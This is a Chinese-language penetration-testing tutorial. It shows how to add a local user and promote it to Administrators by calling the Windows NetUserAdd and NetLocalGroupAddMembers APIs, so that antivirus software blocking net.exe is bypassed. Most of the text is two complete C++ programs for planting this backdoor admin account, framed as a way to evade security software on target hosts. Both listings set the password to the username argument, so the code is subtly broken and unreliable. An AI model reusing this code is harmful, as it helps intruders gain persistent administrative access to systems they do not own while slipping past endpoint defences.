为什么需要调用WindowsAPI来操作?
在日常渗透测试中遇到很多主机存在一些杀毒软件导致net.exe 无法使用或者限制操作,这让无法通过该方法进行添加用户,删除用户等,这个时候就需要通过调用系统的API来进行操作,来绕过这些限制。
例如下图。
编写条件
根据官方文档上给的示例进行根据自己的需求修改,官网上使用的是C++,你需要一个C++编译的环境,我这里使用的是Visual Studio 2019安装教程
建立对应的项目
Visual Studio 2019 打开后最上面文件—>新建—>项目,填写对应的项目名称等。
官方文档 NetUserAdd function
https://docs.microsoft.com/en-us/windows/win32/api/lmaccess/nf-lmaccess-netuseradd
新建一个用户后给予这个账号一个对应的权限。
Syntax
NET_API_STATUS NET_API_FUNCTION NetUserAdd(LPCWSTR servername,DWORD level,LPBYTE buf,LPDWORD parm_err);
Parameters
servername
指向常量字符串的指针,该字符串指定要在其上执行函数的远程服务器的 DNS 或 NetBIOS 名称。如果此参数为NULL,则使用本地计算机。
如果定义了_WIN32_WINNT或FORCE_UNICODE,则此字符串是 Unicode 。
level
指定数据的信息级别。此参数可以是以下值之一。
| Value | Meaning |
|---|---|
| 1 | Specifies information about the user account. The buf parameter points to a USER_INFO_1 structure. When you specify this level, the call initializes certain attributes to their default values. For more information, see the following Remarks section. |
| 2 | Specifies level one information and additional attributes about the user account. The buf parameter points to a USER_INFO_2 structure. |
| 3 | Specifies level two information and additional attributes about the user account. This level is valid only on servers. The buf parameter points to a USER_INFO_3 structure. Note that it is recommended that you use USER_INFO_4 instead. |
| 4 | Specifies level two information and additional attributes about the user account. This level is valid only on servers. The buf parameter points to a USER_INFO_4 structure. Windows 2000: This level is not supported. |
buf
Pointer to the buffer that specifies the data. The format of this data depends on the value of the level parameter. For more information, see Network Management Function Buffers.
parm_err
Pointer to a value that receives the index of the first member of the user information structure that causes ERROR_INVALID_PARAMETER. If this parameter is NULL, the index is not returned on error. For more information, see the NetUserSetInfo function.
Return value
If the function succeeds, the return value is NERR_Success.
If the function fails, the return value can be one of the following error codes.
| Return code | Description |
|---|---|
| ERROR_ACCESS_DENIED | The user does not have access to the requested information. |
| NERR_InvalidComputer | The computer name is invalid. |
| NERR_NotPrimary | The operation is allowed only on the primary domain controller of the domain. |
| NERR_GroupExists | The group already exists. |
| NERR_UserExists | The user account already exists. |
| NERR_PasswordTooShort | The password is shorter than required. (The password could also be too long, be too recent in its change history, not have enough unique characters, or not meet another password policy requirement.) |
编写代码
过程
- 定义USER_INFO_1 结构体
NetUserAdd
NET_API_STATUS NET_API_FUNCTIONNetUserAdd (IN LPCWSTR servername OPTIONAL, //IN DWORD level,IN LPBYTE buf,OUT LPDWORD parm_err OPTIONAL);
NetLocalGroupAddMembers
NET_API_STATUS NET_API_FUNCTIONNetLocalGroupAddMembers (IN LPCWSTR servername OPTIONAL,IN LPCWSTR groupname,IN DWORD level,IN LPBYTE buf,IN DWORD totalentries);
- 调用NetUserAdd添加普通权限账户
- 调用NetLocalGroupAddMembers添加到管理员组
添加用户
示例代码中我们需要调整servername 为NULL,使用本地计算机,接收用户和密码,后需要加入管理员中。
#ifndef UNICODE#define UNICODE#endif#pragma comment(lib, "netapi32.lib")#include <stdio.h>#include <windows.h>#include <lm.h>// 定义USER_INFO_1结构体int wmain(int argc, wchar_t* argv[]){USER_INFO_1 ui;DWORD dwLevel = 1;DWORD dwError = 0;NET_API_STATUS nStatus;//接收对应的账号 密码if (argc != 3){fwprintf(stderr, L"Usage: ApiUserAdd.exe [Username] [Password]", argv[0]);exit(1);}//// Set up the USER_INFO_1 structure.// USER_PRIV_USER: name identifies a user,// rather than an administrator or a guest.// UF_SCRIPT: required//ui.usri1_name = argv[1];//账号ui.usri1_password = argv[1];//密码ui.usri1_priv = USER_PRIV_USER;ui.usri1_home_dir = NULL;ui.usri1_comment = NULL;ui.usri1_flags = UF_SCRIPT;ui.usri1_script_path = NULL;//// Call the NetUserAdd function, specifying level 1.////// If the call succeeds, inform the user.//if (NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError) == NERR_Success)printf("successfully");//// Otherwise, print the system error.//elseprintf("fail");return 0;}
上面代码主要实现了添加一个用户的功能,没有加入到管理员中
接下来还差一步,需要把这个普通用户的账号提升为管理员权限。
提升为管理员
#ifndef UNICODE#define UNICODE#endif#pragma comment(lib, "netapi32.lib")#include <stdio.h>#include <windows.h>#include <lm.h>// 定义USER_INFO_1结构体int wmain(int argc, wchar_t* argv[]){USER_INFO_1 ui;DWORD dwLevel = 1;DWORD dwError = 0;NET_API_STATUS nStatus;//接收对应的账号密码if (argc != 3){fwprintf(stderr, L"Usage: ApiUserAdd.exe [Username] [Password]", argv[0]);exit(1);}//// Set up the USER_INFO_1 structure.// USER_PRIV_USER: name identifies a user,// rather than an administrator or a guest.// UF_SCRIPT: required//ui.usri1_name = argv[1];//账号ui.usri1_password = argv[1];//密码ui.usri1_priv = USER_PRIV_USER;ui.usri1_home_dir = NULL;ui.usri1_comment = NULL;ui.usri1_flags = UF_SCRIPT;ui.usri1_script_path = NULL;//// Call the NetUserAdd function, specifying level 1.////// If the call succeeds, inform the user.//if (NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError) == NERR_Success) {//添加用户成功printf("Add User successfully\n");// 添加过的用户加入到administrators组LOCALGROUP_MEMBERS_INFO_3 account;account.lgrmi3_domainandname = ui.usri1_name;if (NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1) == NERR_Success){//添加管理员成功printf("Add Administrators Group successfully\n");}else{//添加管理员组失败printf("Add Administrators Group Fail");}}//// Otherwise, print the system error.//else {//添加用户失败printf("Add User Fail");}return 0;}
最终效果。
Reference
https://docs.microsoft.com/en-us/windows/win32/api/lmaccess/nf-lmaccess-netuseradd https://lengjibo.github.io/netuser/
若有收获,就点个赞吧
0 人点赞
